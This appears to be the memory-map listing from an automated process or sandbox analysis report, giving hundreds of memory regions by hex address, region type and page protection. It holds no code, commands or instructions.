|
|
|
23B000
|
unkown
|
page read and write
|
|
|
|
3F6000
|
unkown
|
page read and write
|
|
|
|
E0000
|
unkown
|
page read and write
|
|
|
|
420000
|
unkown
|
page read and write
|
|
|
|
2520000
|
heap private
|
page read and write
|
|
|
|
7FFFFF00000
|
unkown
|
page execute and read and write
|
|
|
|
2CE000
|
heap default
|
page read and write
|
|
|
|
30BC000
|
unkown
|
page read and write
|
|
|
|
1004D000
|
unkown image
|
page read and write
|
|
|
|
3FF000
|
heap default
|
page read and write
|
|
|
|
100000
|
heap default
|
page read and write
|
|
|
|
130000
|
unkown
|
page readonly
|
|
|
|
2680000
|
heap private
|
page read and write
|
|
|
|
456000
|
heap default
|
page read and write
|
|
|
|
3E7000
|
heap default
|
page read and write
|
|
|
|
3E4000
|
heap private
|
page read and write
|
|
|
|
2A0000
|
heap default
|
page read and write
|
|
|
|
3A8B000
|
unkown
|
page read and write
|
|
|
|
258F000
|
unkown
|
page read and write
|
|
|
|
2D20000
|
unkown
|
page read and write
|
|
|
|
2EE000
|
heap default
|
page read and write
|
|
|
|
31F3000
|
unkown
|
page read and write
|
|
|
|
4A0000
|
unkown
|
page readonly
|
|
|
|
620000
|
unkown
|
page readonly
|
|
|
|
9F4000
|
heap private
|
page read and write
|
|
|
|
340000
|
unkown
|
page readonly
|
|
|
|
1F70000
|
unkown
|
page readonly
|
|
|
|
7FF00217000
|
unkown
|
page read and write
|
|
|
|
3290000
|
unkown
|
page read and write
|
|
|
|
3296000
|
unkown
|
page read and write
|
|
|
|
C7000
|
heap private
|
page read and write
|
|
|
|
3170000
|
unkown
|
page readonly
|
|
|
|
325E000
|
unkown
|
page read and write
|
|
|
|
8D0000
|
unkown
|
page read and write
|
|
|
|
22DC000
|
unkown
|
page read and write
|
|
|
|
1004D000
|
unkown image
|
page read and write
|
|
|
|
1DB000
|
unkown
|
page read and write
|
|
|
|
90000
|
unkown
|
page readonly
|
|
|
|
2234000
|
heap private
|
page read and write
|
|
|
|
7B0000
|
unkown
|
page readonly
|
|
|
|
1004F000
|
unkown image
|
page readonly
|
|
|
|
2730000
|
unkown
|
page read and write
|
|
|
|
10001000
|
unkown image
|
page execute read
|
|
|
|
26A1000
|
heap private
|
page read and write
|
|
|
|
100000
|
unkown
|
page readonly
|
|
|
|
1CE000
|
unkown
|
page read and write
|
|
|
|
357C000
|
unkown
|
page read and write
|
|
|
|
2490000
|
heap private
|
page read and write
|
|
|
|
2741000
|
heap private
|
page read and write
|
|
|
|
2A0000
|
unkown
|
page read and write
|
|
|
|
304C000
|
unkown
|
page read and write
|
|
|
|
1004D000
|
unkown image
|
page read and write
|
|
|
|
20000
|
unkown
|
page readonly
|
|
|
|
2E9000
|
heap default
|
page read and write
|
|
|
|
90000
|
unkown
|
page read and write
|
|
|
|
22B0000
|
unkown
|
page readonly
|
|
|
|
3040000
|
unkown
|
page read and write
|
|
|
|
B4E000
|
stack
|
page read and write
|
|
|
|
2940000
|
unkown
|
page readonly
|
|
|
|
3150000
|
heap private
|
page read and write
|
|
|
|
310D000
|
stack
|
page read and write
|
|
|
|
2650000
|
unkown
|
page write copy
|
|
|
|
7FF0004A000
|
unkown
|
page execute and read and write
|
|
|
|
110000
|
unkown
|
page readonly
|
|
|
|
150000
|
unkown
|
page readonly
|
|
|
|
D60000
|
heap private
|
page read and write
|
|
|
|
380000
|
unkown
|
page readonly
|
|
|
|
20000
|
unkown
|
page readonly
|
|
|
|
1BE0000
|
unkown
|
page read and write
|
|
|
|
316E000
|
unkown
|
page read and write
|
|
|
|
B10000
|
heap private
|
page read and write
|
|
|
|
F0000
|
unkown
|
page write copy
|
|
|
|
10000000
|
unkown image
|
page readonly
|
|
|
|
620000
|
unkown
|
page readonly
|
|
|
|
10000000
|
unkown image
|
page readonly
|
|
|
|
7FF00052000
|
unkown
|
page execute and read and write
|
|
|
|
808000
|
heap private
|
page read and write
|
|
|
|
2A40000
|
unkown
|
page readonly
|
|
|
|
31B000
|
unkown
|
page read and write
|
|
|
|
D0000
|
unkown
|
page read and write
|
|
|
|
26C0000
|
unkown
|
page readonly
|
|
|
|
2FC000
|
heap default
|
page read and write
|
|
|
|
C0000
|
heap private
|
page read and write
|
|
|
|
262D000
|
stack
|
page read and write
|
|
|
|
3702000
|
unkown
|
page read and write
|
|
|
|
10000000
|
unkown image
|
page readonly
|
|
|
|
A20000
|
heap private
|
page read and write
|
|
|
|
258D000
|
unkown
|
page read and write
|
|
|
|
980000
|
unkown
|
page read and write
|
|
|
|
3E0000
|
unkown
|
page readonly
|
|
|
|
592000
|
heap default
|
page read and write
|
|
|
|
1B0000
|
unkown
|
page read and write
|
|
|
|
890000
|
heap private
|
page read and write
|
|
|
|
36FF000
|
unkown
|
page read and write
|
|
|
|
2390000
|
unkown
|
page readonly
|
|
|
|
10042000
|
unkown image
|
page readonly
|
|
|
|
100000
|
unkown
|
page read and write
|
|
|
|
2C9E000
|
unkown
|
page read and write
|
|
|
|
2020000
|
unkown
|
page readonly
|
|
|
|
325D000
|
unkown
|
page read and write
|
|
|
|
3A7000
|
heap default
|
page read and write
|
|
|
|
2550000
|
unkown
|
page readonly
|
|
|
|
24A000
|
stack
|
page read and write
|
|
|
|
90000
|
unkown
|
page readonly
|
|
|
|
1F0000
|
unkown
|
page readonly
|
|
|
|
2CA000
|
stack
|
page read and write
|
|
|
|
710000
|
heap private
|
page read and write
|
|
|
|
2170000
|
unkown
|
page readonly
|
|
|
|
A80000
|
heap private
|
page read and write
|
|
|
|
2B40000
|
unkown
|
page readonly
|
|
|
|
314E000
|
unkown
|
page read and write
|
|
|
|
3216000
|
unkown
|
page read and write
|
|
|
|
175000
|
unkown
|
page read and write | page guard
|
|
|
|
348B000
|
unkown
|
page read and write
|
|
|
|
1CB73000
|
heap private
|
page read and write
|
|
|
|
30FD000
|
stack
|
page read and write
|
|
|
|
740000
|
unkown
|
page readonly
|
|
|
|
1004F000
|
unkown image
|
page readonly
|
|
|
|
24A2000
|
heap private
|
page read and write
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
2D41000
|
unkown
|
page read and write
|
|
|
|
330E000
|
unkown
|
page read and write
|
|
|
|
120000
|
unkown
|
page readonly
|
|
|
|
31C000
|
unkown
|
page read and write
|
|
|
|
176000
|
unkown
|
page read and write
|
|
|
|
4E7000
|
heap default
|
page read and write
|
|
|
|
7EFDF000
|
unkown
|
page read and write
|
|
|
|
958000
|
heap private
|
page read and write
|
|
|
|
B3C000
|
unkown
|
page read and write
|
|
|
|
2252000
|
heap private
|
page read and write
|
|
|
|
34D0000
|
heap private
|
page read and write
|
|
|
|
3AB8000
|
unkown
|
page read and write
|
|
|
|
3050000
|
unkown
|
page read and write
|
|
|
|
900000
|
unkown
|
page readonly
|
|
|
|
90E000
|
stack
|
page read and write
|
|
|
|
2157000
|
unkown
|
page readonly
|
|
|
|
BB000
|
unkown
|
page read and write
|
|
|
|
2524000
|
heap private
|
page read and write
|
|
|
|
250E000
|
stack
|
page read and write
|
|
|
|
10000000
|
unkown image
|
page readonly
|
|
|
|
2FD9000
|
unkown
|
page read and write
|
|
|
|
2751000
|
heap private
|
page read and write
|
|
|
|
1C9CE000
|
unkown
|
page read and write
|
|
|
|
30D0000
|
unkown
|
page read and write
|
|
|
|
30F6000
|
unkown
|
page read and write
|
|
|
|
F0000
|
unkown
|
page readonly
|
|
|
|
3ABC000
|
unkown
|
page read and write
|
|
|
|
1C6CE000
|
unkown
|
page read and write
|
|
|
|
316000
|
unkown
|
page read and write
|
|
|
|
55D000
|
heap default
|
page read and write
|
|
|
|
18C000
|
unkown
|
page read and write
|
|
|
|
2590000
|
unkown
|
page readonly
|
|
|
|
27F000
|
unkown
|
page read and write
|
|
|
|
3EF000
|
heap default
|
page read and write
|
|
|
|
280000
|
heap default
|
page read and write
|
|
|
|
4D8000
|
heap private
|
page read and write
|
|
|
|
7FF00290000
|
unkown
|
page read and write
|
|
|
|
312F000
|
unkown
|
page read and write
|
|
|
|
360000
|
heap default
|
page read and write
|
|
|
|
B1E000
|
stack
|
page read and write
|
|
|
|
3073000
|
unkown
|
page read and write
|
|
|
|
1CE0000
|
unkown
|
page readonly
|
|
|
|
1004F000
|
unkown image
|
page readonly
|
|
|
|
7CC000
|
heap default
|
page read and write
|
|
|
|
8F0000
|
heap private
|
page read and write
|
|
|
|
970000
|
heap private
|
page read and write
|
|
|
|
363C000
|
unkown
|
page read and write
|
|
|
|
978000
|
heap private
|
page read and write
|
|
|
|
328000
|
unkown
|
page read and write
|
|
|
|
20000
|
unkown
|
page readonly
|
|
|
|
5C8000
|
heap default
|
page read and write
|
|
|
|
ADF000
|
stack
|
page read and write
|
|
|
|
AA0000
|
unkown
|
page write copy
|
|
|
|
1B494000
|
unkown
|
page read and write
|
|
|
|
B00000
|
heap private
|
page read and write
|
|
|
|
7FF002A0000
|
unkown
|
page execute and read and write
|
|
|
|
365B000
|
unkown
|
page read and write
|
|
|
|
200000
|
heap default
|
page read and write
|
|
|
|
20000
|
heap private
|
page read and write
|
|
|
|
306D000
|
unkown
|
page read and write
|
|
|
|
41F000
|
stack
|
page read and write
|
|
|
|
780000
|
unkown
|
page readonly
|
|
|
|
60000
|
unkown
|
page readonly
|
|
|
|
710000
|
unkown
|
page readonly
|
|
|
|
D68000
|
heap private
|
page read and write
|
|
|
|
7A0000
|
unkown
|
page readonly
|
|
|
|
2484000
|
heap private
|
page read and write
|
|
|
|
3066000
|
unkown
|
page read and write
|
|
|
|
7A0000
|
heap private
|
page read and write
|
|
|
|
240000
|
unkown
|
page readonly
|
|
|
|
7FF00115000
|
unkown
|
page read and write
|
|
|
|
1A0000
|
unkown
|
page readonly
|
|
|
|
310E000
|
unkown
|
page read and write
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
350000
|
heap default
|
page read and write
|
|
|
|
426000
|
unkown
|
page read and write
|
|
|
|
218000
|
heap private
|
page read and write
|
|
|
|
366E000
|
unkown
|
page read and write
|
|
|
|
1CC000
|
unkown
|
page read and write
|
|
|
|
2354000
|
heap private
|
page read and write
|
|
|
|
1EB0000
|
unkown
|
page readonly
|
|
|
|
2B00000
|
heap private
|
page execute and read and write
|
|
|
|
6C0000
|
unkown
|
page readonly
|
|
|
|
B3F000
|
stack
|
page read and write
|
|
|
|
7FF001A0000
|
unkown
|
page execute and read and write
|
|
|
|
140000
|
unkown
|
page read and write
|
|
|
|
38F000
|
unkown
|
page read and write
|
|
|
|
964000
|
unkown
|
page read and write
|
|
|
|
20C000
|
unkown
|
page read and write
|
|
|
|
130000
|
unkown
|
page readonly
|
|
|
|
28AF000
|
unkown
|
page read and write
|
|
|
|
339E000
|
stack
|
page read and write
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
1EC0000
|
unkown
|
page readonly
|
|
|
|
1F5B000
|
heap private
|
page read and write
|
|
|
|
670000
|
unkown
|
page readonly
|
|
|
|
10000000
|
unkown image
|
page readonly
|
|
|
|
2CEE000
|
stack
|
page read and write
|
|
|
|
10000000
|
unkown image
|
page readonly
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
10000000
|
unkown image
|
page readonly
|
|
|
|
20A0000
|
heap private
|
page read and write
|
|
|
|
2B40000
|
unkown
|
page read and write
|
|
|
|
2724000
|
heap private
|
page read and write
|
|
|
|
339E000
|
unkown
|
page read and write
|
|
|
|
300000
|
unkown
|
page readonly
|
|
|
|
100000
|
unkown
|
page read and write
|
|
|
|
36EA000
|
unkown
|
page read and write
|
|
|
|
AB000
|
unkown
|
page read and write
|
|
|
|
2FC3000
|
unkown
|
page read and write
|
|
|
|
2B0000
|
unkown
|
page readonly
|
|
|
|
A80000
|
heap private
|
page read and write
|
|
|
|
120000
|
unkown
|
page readonly
|
|
|
|
2D72000
|
unkown
|
page read and write
|
|
|
|
170000
|
unkown
|
page readonly
|
|
|
|
2400000
|
unkown
|
page write copy
|
|
|
|
3AD7000
|
unkown
|
page read and write
|
|
|
|
2540000
|
heap private
|
page read and write
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
568000
|
heap default
|
page read and write
|
|
|
|
7FF001F0000
|
unkown
|
page read and write
|
|
|
|
282F000
|
unkown
|
page read and write
|
|
|
|
2CA000
|
stack
|
page read and write
|
|
|
|
AB000
|
stack
|
page read and write
|
|
|
|
237000
|
heap default
|
page read and write
|
|
|
|
7EFDF000
|
unkown
|
page read and write
|
|
|
|
1DC0000
|
heap private
|
page execute and read and write
|
|
|
|
840000
|
heap private
|
page read and write
|
|
|
|
7EFDF000
|
unkown
|
page read and write
|
|
|
|
1B41F000
|
unkown
|
page read and write
|
|
|
|
3170000
|
unkown
|
page write copy
|
|
|
|
307E000
|
stack
|
page read and write
|
|
|
|
494000
|
heap private
|
page read and write
|
|
|
|
270000
|
unkown
|
page readonly
|
|
|
|
782000
|
heap private
|
page read and write
|
|
|
|
8EE000
|
unkown
|
page read and write
|
|
|
|
180000
|
unkown
|
page readonly
|
|
|
|
1004F000
|
unkown image
|
page readonly
|
|
|
|
3AE000
|
heap default
|
page read and write
|
|
|
|
20000
|
unkown
|
page readonly
|
|
|
|
7EFDF000
|
unkown
|
page read and write
|
|
|
|
6BE000
|
unkown
|
page read and write
|
|
|
|
29CE000
|
unkown
|
page read and write
|
|
|
|
490000
|
heap private
|
page read and write
|
|
|
|
3AE8000
|
unkown
|
page read and write
|
|
|
|
3212000
|
unkown
|
page read and write
|
|
|
|
D0000
|
unkown
|
page readonly
|
|
|
|
293F000
|
unkown
|
page read and write
|
|
|
|
75D000
|
stack
|
page read and write
|
|
|
|
81C000
|
unkown
|
page read and write
|
|
|
|
2CDE000
|
unkown
|
page read and write | page guard
|
|
|
|
270000
|
unkown
|
page read and write
|
|
|
|
2B7000
|
heap default
|
page read and write
|
|
|
|
960000
|
unkown
|
page read and write
|
|
|
|
248C000
|
unkown
|
page read and write
|
|
|
|
2530000
|
heap private
|
page read and write
|
|
|
|
3B7000
|
heap default
|
page read and write
|
|
|
|
7EFDF000
|
unkown
|
page read and write
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
7FF001E0000
|
unkown
|
page execute and read and write
|
|
|
|
316E000
|
unkown
|
page read and write
|
|
|
|
2A3D000
|
unkown
|
page read and write
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
250000
|
heap private
|
page read and write
|
|
|
|
2FB6000
|
unkown
|
page read and write
|
|
|
|
3763000
|
unkown
|
page read and write
|
|
|
|
1B41B000
|
unkown
|
page read and write
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
850000
|
heap private
|
page read and write
|
|
|
|
3318000
|
unkown
|
page read and write
|
|
|
|
1F20000
|
heap private
|
page read and write
|
|
|
|
960000
|
heap private
|
page read and write
|
|
|
|
45E000
|
unkown
|
page read and write
|
|
|
|
B50000
|
unkown
|
page readonly
|
|
|
|
31C0000
|
unkown
|
page write copy
|
|
|
|
24CF000
|
stack
|
page read and write
|
|
|
|
7FF00190000
|
unkown
|
page execute and read and write
|
|
|
|
3AC0000
|
unkown
|
page read and write
|
|
|
|
30C5000
|
unkown
|
page read and write
|
|
|
|
3C4000
|
heap default
|
page read and write
|
|
|
|
10000000
|
unkown image
|
page readonly
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
251F000
|
stack
|
page read and write
|
|
|
|
100000
|
unkown
|
page read and write
|
|
|
|
320000
|
unkown
|
page readonly
|
|
|
|
12FF2000
|
unkown
|
page read and write
|
|
|
|
980000
|
unkown
|
page readonly
|
|
|
|
760000
|
heap private
|
page read and write
|
|
|
|
4B7000
|
heap default
|
page read and write
|
|
|
|
30ED000
|
unkown
|
page read and write
|
|
|
|
557000
|
heap default
|
page read and write
|
|
|
|
2050000
|
unkown
|
page readonly
|
|
|
|
32BF000
|
stack
|
page read and write
|
|
|
|
2D0000
|
unkown
|
page read and write
|
|
|
|
374000
|
heap default
|
page read and write
|
|
|
|
238D000
|
stack
|
page read and write
|
|
|
|
100000
|
unkown
|
page read and write
|
|
|
|
2DA4000
|
unkown
|
page read and write
|
|
|
|
754000
|
heap default
|
page read and write
|
|
|
|
160000
|
unkown
|
page readonly
|
|
|
|
7FF00240000
|
unkown
|
page read and write
|
|
|
|
20B0000
|
unkown
|
page readonly
|
|
|
|
1ECC000
|
unkown
|
page readonly
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
95F000
|
unkown
|
page read and write
|
|
|
|
7D1000
|
heap default
|
page read and write
|
|
|
|
894000
|
heap private
|
page read and write
|
|
|
|
3658000
|
unkown
|
page read and write
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
402000
|
unkown
|
page read and write
|
|
|
|
2C5E000
|
unkown
|
page read and write
|
|
|
|
287000
|
heap default
|
page read and write
|
|
|
|
25E000
|
unkown
|
page read and write
|
|
|
|
1DC000
|
unkown
|
page read and write
|
|
|
|
7EFDF000
|
unkown
|
page read and write
|
|
|
|
77F000
|
heap default
|
page read and write
|
|
|
|
409000
|
heap default
|
page read and write
|
|
|
|
10B000
|
unkown
|
page read and write
|
|
|
|
890000
|
unkown
|
page read and write
|
|
|
|
520000
|
heap default
|
page read and write
|
|
|
|
718000
|
heap private
|
page read and write
|
|
|
|
1004F000
|
unkown image
|
page readonly
|
|
|
|
32EE000
|
stack
|
page read and write
|
|
|
|
2ACA000
|
heap private
|
page execute and read and write
|
|
|
|
ACC000
|
unkown
|
page read and write
|
|
|
|
20000
|
unkown
|
page readonly
|
|
|
|
500000
|
unkown
|
page readonly
|
|
|
|
520000
|
unkown
|
page readonly
|
|
|
|
2E20000
|
unkown
|
page readonly
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
7FF001D0000
|
unkown
|
page read and write
|
|
|
|
3110000
|
unkown
|
page readonly
|
|
|
|
1004D000
|
unkown image
|
page read and write
|
|
|
|
3668000
|
unkown
|
page read and write
|
|
|
|
2350000
|
unkown
|
page readonly
|
|
|
|
1B411000
|
unkown
|
page read and write
|
|
|
|
1C8EE000
|
unkown
|
page read and write
|
|
|
|
2770000
|
unkown
|
page readonly
|
|
|
|
17C000
|
unkown
|
page read and write
|
|
|
|
AED000
|
stack
|
page read and write
|
|
|
|
1ADA0000
|
unkown
|
page read and write
|
|
|
|
25C000
|
unkown
|
page read and write
|
|
|
|
7FF00180000
|
unkown
|
page read and write
|
|
|
|
21A000
|
stack
|
page read and write
|
|
|
|
2FA4000
|
unkown
|
page read and write
|
|
|
|
970000
|
heap private
|
page read and write
|
|
|
|
3A96000
|
unkown
|
page read and write
|
|
|
|
2060000
|
unkown
|
page readonly
|
|
|
|
527000
|
heap default
|
page read and write
|
|
|
|
3AD3000
|
unkown
|
page read and write
|
|
|
|
18B000
|
unkown
|
page read and write
|
|
|
|
12D41000
|
unkown
|
page read and write
|
|
|
|
A1D000
|
unkown
|
page read and write
|
|
|
|
210000
|
heap private
|
page read and write
|
|
|
|
456000
|
unkown
|
page read and write
|
|
|
|
700000
|
heap private
|
page read and write
|
|
|
|
1004F000
|
unkown image
|
page readonly
|
|
|
|
3078000
|
unkown
|
page read and write
|
|
|
|
B5E000
|
unkown
|
page read and write
|
|
|
|
30D4000
|
unkown
|
page read and write
|
|
|
|
1C40000
|
unkown
|
page readonly
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
544000
|
heap default
|
page read and write
|
|
|
|
2D70000
|
unkown
|
page readonly
|
|
|
|
1F70000
|
unkown
|
page readonly
|
|
|
|
1004D000
|
unkown image
|
page read and write
|
|
|
|
3F0000
|
unkown
|
page readonly
|
|
|
|
1004D000
|
unkown image
|
page read and write
|
|
|
|
3054000
|
unkown
|
page read and write
|
|
|
|
207000
|
heap default
|
page read and write
|
|
|
|
7FF00110000
|
unkown
|
page read and write
|
|
|
|
940000
|
unkown
|
page readonly
|
|
|
|
326000
|
heap default
|
page read and write
|
|
|
|
10000000
|
unkown image
|
page readonly
|
|
|
|
2F1000
|
heap default
|
page read and write
|
|
|
|
1B8C0000
|
unkown
|
page read and write
|
|
|
|
90000
|
unkown
|
page readonly
|
|
|
|
2D30000
|
heap private
|
page read and write
|
|
|
|
180000
|
unkown
|
page read and write
|
|
|
|
1004D000
|
unkown image
|
page read and write
|
|
|
|
1F70000
|
unkown
|
page readonly
|
|
|
|
640000
|
unkown
|
page readonly
|
|
|
|
1004F000
|
unkown image
|
page readonly
|
|
|
|
31E0000
|
unkown
|
page write copy
|
|
|
|
3652000
|
unkown
|
page read and write
|
|
|
|
59C000
|
heap default
|
page read and write
|
|
|
|
190000
|
unkown
|
page readonly
|
|
|
|
12D6C000
|
unkown
|
page read and write
|
|
|
|
2F97000
|
unkown
|
page read and write
|
|
|
|
7C0000
|
unkown
|
page readonly
|
|
|
|
4D4000
|
heap default
|
page read and write
|
|
|
|
3C4000
|
heap default
|
page read and write
|
|
|
|
7F0000
|
unkown
|
page readonly
|
|
|
|
278E000
|
unkown
|
page read and write
|
|
|
|
28B4000
|
unkown
|
page read and write
|
|
|
|
730000
|
heap default
|
page read and write
|
|
|
|
2F91000
|
unkown
|
page read and write
|
|
|
|
30F0000
|
unkown
|
page read and write
|
|
|
|
1F0000
|
unkown
|
page readonly
|
|
|
|
1F70000
|
unkown
|
page readonly
|
|
|
|
380000
|
unkown
|
page readonly
|
|
|
|
30E0000
|
unkown
|
page write copy
|
|
|
|
2CF0000
|
unkown
|
page readonly
|
|
|
|
280000
|
unkown
|
page readonly
|
|
|
|
3D4000
|
heap default
|
page read and write
|
|
|
|
1D0000
|
unkown
|
page read and write
|
|
|
|
303C000
|
unkown
|
page read and write
|
|
|
|
2157000
|
unkown
|
page readonly
|
|
|
|
1F70000
|
unkown
|
page readonly
|
|
|
|
230000
|
heap default
|
page read and write
|
|
|
|
AB000
|
unkown
|
page read and write
|
|
|
|
3D0000
|
heap private
|
page read and write
|
|
|
|
308D000
|
unkown
|
page read and write
|
|
|
|
90000
|
unkown
|
page readonly
|
|
|
|
366B000
|
unkown
|
page read and write
|
|
|
|
170000
|
unkown
|
page readonly
|
|
|
|
1F70000
|
unkown
|
page readonly
|
|
|
|
1CA80000
|
heap private
|
page read and write
|
|
|
|
310000
|
unkown
|
page read and write
|
|
|
|
2157000
|
unkown
|
page readonly
|
|
|
|
D0000
|
unkown
|
page readonly
|
|
|
|
210000
|
heap private
|
page read and write
|
|
|
|
1EEB000
|
unkown
|
page readonly
|
|
|
|
4F0000
|
unkown
|
page readonly
|
|
|
|
3A0000
|
heap default
|
page read and write
|
|
|
|
32FD000
|
unkown
|
page read and write
|
|
|
|
6BC000
|
unkown
|
page read and write
|
|
|
|
2390000
|
unkown
|
page readonly
|
|
|
|
2D34000
|
heap private
|
page read and write
|
|
|
|
7EFDF000
|
unkown
|
page read and write
|
|
|
|
3EF000
|
heap default
|
page read and write
|
|
|
|
1004D000
|
unkown image
|
page read and write
|
|
|
|
D0000
|
unkown
|
page readonly
|
|
|
|
180000
|
unkown
|
page readonly
|
|
|
|
1C4000
|
heap private
|
page read and write
|
|
|
|
2350000
|
heap private
|
page read and write
|
|
|
|
363F000
|
unkown
|
page read and write
|
|
|
|
39B000
|
heap default
|
page read and write
|
|
|
|
280000
|
unkown
|
page readonly
|
|
|
|
9C0000
|
unkown
|
page read and write
|
|
|
|
10000000
|
unkown image
|
page readonly
|
|
|
|
180000
|
unkown
|
page read and write
|
|
|
|
B5E000
|
stack
|
page read and write
|
|
|
|
2157000
|
unkown
|
page readonly
|
|
|
|
39D000
|
heap default
|
page read and write
|
|
|
|
7D0000
|
unkown
|
page readonly
|
|
|
|
A50000
|
heap private
|
page read and write
|
|
|
|
2CF000
|
heap default
|
page read and write
|
|
|
|
309C000
|
unkown
|
page read and write
|
|
|
|
528000
|
heap default
|
page read and write
|
|
|
|
890000
|
heap private
|
page read and write
|
|
|
|
28B0000
|
unkown
|
page readonly
|
|
|
|
D0000
|
unkown
|
page read and write
|
|
|
|
284000
|
heap private
|
page read and write
|
|
|
|
A34000
|
heap private
|
page read and write
|
|
|
|
2720000
|
heap private
|
page read and write
|
|
|
|
59A000
|
heap default
|
page read and write
|
|
|
|
84E000
|
unkown
|
page read and write
|
|
|
|
920000
|
unkown
|
page read and write
|
|
|
|
10042000
|
unkown image
|
page readonly
|
|
|
|
3687000
|
unkown
|
page read and write
|
|
|
|
390000
|
unkown
|
page readonly
|
|
|
|
32D000
|
unkown
|
page read and write
|
|
|
|
28BA000
|
unkown
|
page read and write
|
|
|
|
293F000
|
stack
|
page read and write
|
|
|
|
24C0000
|
unkown
|
page readonly
|
|
|
|
366000
|
heap default
|
page read and write
|
|
|
|
3AC6000
|
unkown
|
page read and write
|
|
|
|
41D000
|
heap default
|
page read and write
|
|
|
|
2930000
|
unkown
|
page readonly
|
|
|
|
6A0000
|
unkown
|
page read and write
|
|
|
|
B0000
|
unkown
|
page readonly
|
|
|
|
360000
|
heap default
|
page read and write
|
|
|
|
1FE0000
|
heap private
|
page read and write
|
|
|
|
570000
|
unkown
|
page readonly
|
|
|
|
2350000
|
unkown
|
page read and write
|
|
|
|
3AF5000
|
unkown
|
page read and write
|
|
|
|
1C79E000
|
unkown
|
page read and write
|
|
|
|
20000
|
unkown
|
page readonly
|
|
|
|
A11000
|
heap private
|
page read and write
|
|
|
|
7FF001C0000
|
unkown
|
page execute and read and write
|
|
|
|
56F000
|
heap default
|
page read and write
|
|
|
|
2C10000
|
unkown
|
page readonly
|
|
|
|
350000
|
unkown
|
page readonly
|
|
|
|
380000
|
unkown
|
page readonly
|
|
|
|
31C0000
|
unkown
|
page readonly
|
|
|
|
10000000
|
unkown image
|
page readonly
|
|
|
|
33EE000
|
stack
|
page read and write
|
|
|
|
950000
|
unkown
|
page readonly
|
|
|
|
3C0000
|
unkown
|
page read and write
|
|
|
|
2AA0000
|
unkown
|
page readonly
|
|
|
|
A84000
|
heap private
|
page read and write
|
|
|
|
32B0000
|
heap private
|
page read and write
|
|
|
|
B70000
|
unkown
|
page readonly
|
|
|
|
1004F000
|
unkown image
|
page readonly
|
|
|
|
2BD000
|
heap default
|
page read and write
|
|
|
|
3D7000
|
heap default
|
page read and write
|
|
|
|
30C2000
|
unkown
|
page read and write
|
|
|
|
26E000
|
heap default
|
page read and write
|
|
|
|
2FC0000
|
unkown
|
page read and write
|
|
|
|
249E000
|
unkown
|
page read and write
|
|
|
|
4C0000
|
unkown
|
page readonly
|
|
|
|
D0000
|
heap default
|
page read and write
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
7FF00230000
|
unkown
|
page execute and read and write
|
|
|
|
1E27000
|
unkown
|
page readonly
|
|
|
|
E0000
|
unkown
|
page read and write
|
|
|
|
2FE8000
|
unkown
|
page read and write
|
|
|
|
10000000
|
unkown image
|
page readonly
|
|
|
|
1A0000
|
heap default
|
page read and write
|
|
|
|
3150000
|
unkown
|
page readonly
|
|
|
|
32BF000
|
unkown
|
page read and write
|
|
|
|
348E000
|
stack
|
page read and write
|
|
|
|
31EE000
|
unkown
|
page read and write
|
|
|
|
10042000
|
unkown image
|
page readonly
|
|
|
|
280000
|
unkown
|
page readonly
|
|
|
|
2270000
|
unkown
|
page readonly
|
|
|
|
2FDD000
|
unkown
|
page read and write
|
|
|
|
140000
|
unkown
|
page read and write
|
|
|
|
2C0000
|
heap default
|
page read and write
|
|
|
|
2CEA000
|
unkown
|
page read and write
|
|
|
|
7FE000
|
unkown
|
page read and write
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
1FA0000
|
unkown
|
page readonly
|
|
|
|
7FF00270000
|
unkown
|
page execute and read and write
|
|
|
|
30A5000
|
unkown
|
page read and write
|
|
|
|
1EC000
|
unkown
|
page read and write
|
|
|
|
927000
|
unkown
|
page readonly
|
|
|
|
36FB000
|
unkown
|
page read and write
|
|
|
|
230000
|
unkown
|
page readonly
|
|
|
|
26BD000
|
stack
|
page read and write
|
|
|
|
370000
|
unkown
|
page readonly
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
1B49A000
|
unkown
|
page read and write
|
|
|
|
309A000
|
unkown
|
page read and write
|
|
|
|
8B2000
|
heap private
|
page read and write
|
|
|
|
10001000
|
unkown image
|
page execute read
|
|
|
|
309E000
|
unkown
|
page read and write
|
|
|
|
2E0000
|
heap private
|
page read and write
|
|
|
|
6D0000
|
unkown
|
page readonly
|
|
|
|
3083000
|
unkown
|
page read and write
|
|
|
|
2CE0000
|
unkown
|
page read and write
|
|
|
|
10042000
|
unkown image
|
page readonly
|
|
|
|
1CE000
|
unkown
|
page read and write
|
|
|
|
A30000
|
heap private
|
page read and write
|
|
|
|
2734000
|
heap private
|
page read and write
|
|
|
|
3DD000
|
heap default
|
page read and write
|
|
|
|
1CB60000
|
heap private
|
page read and write
|
|
|
|
23E000
|
heap default
|
page read and write
|
|
|
|
2FC000
|
heap default
|
page read and write
|
|
|
|
3684000
|
unkown
|
page read and write
|
|
|
|
30F3000
|
unkown
|
page read and write
|
|
|
|
10000000
|
unkown image
|
page readonly
|
|
|
|
2CE5000
|
unkown
|
page read and write
|
|
|
|
2AE0000
|
unkown
|
page readonly
|
|
|
|
2560000
|
unkown
|
page readonly
|
|
|
|
3642000
|
unkown
|
page read and write
|
|
|
|
2E3000
|
heap default
|
page read and write
|
|
|
|
290000
|
unkown
|
page readonly
|
|
|
|
3B0000
|
heap default
|
page read and write
|
|
|
|
2B7000
|
heap default
|
page read and write
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
200000
|
heap private
|
page read and write
|
|
|
|
2D0000
|
unkown
|
page readonly
|
|
|
|
28B0000
|
unkown
|
page read and write
|
|
|
|
259E000
|
unkown
|
page read and write
|
|
|
|
367E000
|
unkown
|
page read and write
|
|
|
|
1B800000
